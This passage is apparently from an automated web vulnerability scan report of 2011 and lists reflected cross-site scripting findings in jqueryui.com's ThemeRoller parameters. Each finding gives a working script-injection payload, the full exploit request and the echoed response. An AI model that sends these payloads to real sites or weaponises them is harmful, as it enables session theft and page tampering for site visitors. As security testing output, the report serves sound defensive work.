   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a200d2"><script>alert(1)</script>efe4a57817&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

3.76. http://jqueryui.com/themeroller/ [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff3a8"><script>alert(1)</script>25cc0117949 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaff3a8"><script>alert(1)</script>25cc0117949&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaff3a8"><script>alert(1)</script>25cc0117949&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

3.77. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7165b"><script>alert(1)</script>3b4b521d593 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa17165b"><script>alert(1)</script>3b4b521d593&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa17165b"><script>alert(1)</script>3b4b521d593&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

3.78. http://jqueryui.com/themeroller/ [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46bd0"><script>alert(1)</script>574ccf7b54f was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999946bd0"><script>alert(1)</script>574ccf7b54f&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999946bd0"><script>alert(1)</script>574ccf7b54f&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgT
...[SNIP]...

3.79. http://jqueryui.com/themeroller/ [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da997"><script>alert(1)</script>393dd978478 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxda997"><script>alert(1)</script>393dd978478&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxda997"><script>alert(1)</script>393dd978478&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

3.80. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e7ae"><script>alert(1)</script>8978ab3951d was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px3e7ae"><script>alert(1)</script>8978ab3951d HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px3e7ae"><script>alert(1)</script>8978ab3951d" type="text/css" media="all" />
...[SNIP]...

3.81. http://jqueryui.com/themeroller/ [fcActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4728a"><script>alert(1)</script>e4181889fbb was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=2121214728a"><script>alert(1)</script>e4181889fbb&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=2121214728a"><script>alert(1)</script>e4181889fbb&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

3.82. http://jqueryui.com/themeroller/ [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69af0"><script>alert(1)</script>18274536c6e was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222269af0"><script>alert(1)</script>18274536c6e&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222269af0"><script>alert(1)</script>18274536c6e&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

3.83. http://jqueryui.com/themeroller/ [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbdc8"><script>alert(1)</script>192e61c2ff2 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555dbdc8"><script>alert(1)</script>192e61c2ff2&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555dbdc8"><script>alert(1)</script>192e61c2ff2&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.
...[SNIP]...

3.84. http://jqueryui.com/themeroller/ [fcError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7fbc"><script>alert(1)</script>e518040edc1 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ac7fbc"><script>alert(1)</script>e518040edc1&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ac7fbc"><script>alert(1)</script>e518040edc1&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

3.85. http://jqueryui.com/themeroller/ [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d936"><script>alert(1)</script>738d6424a3a was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

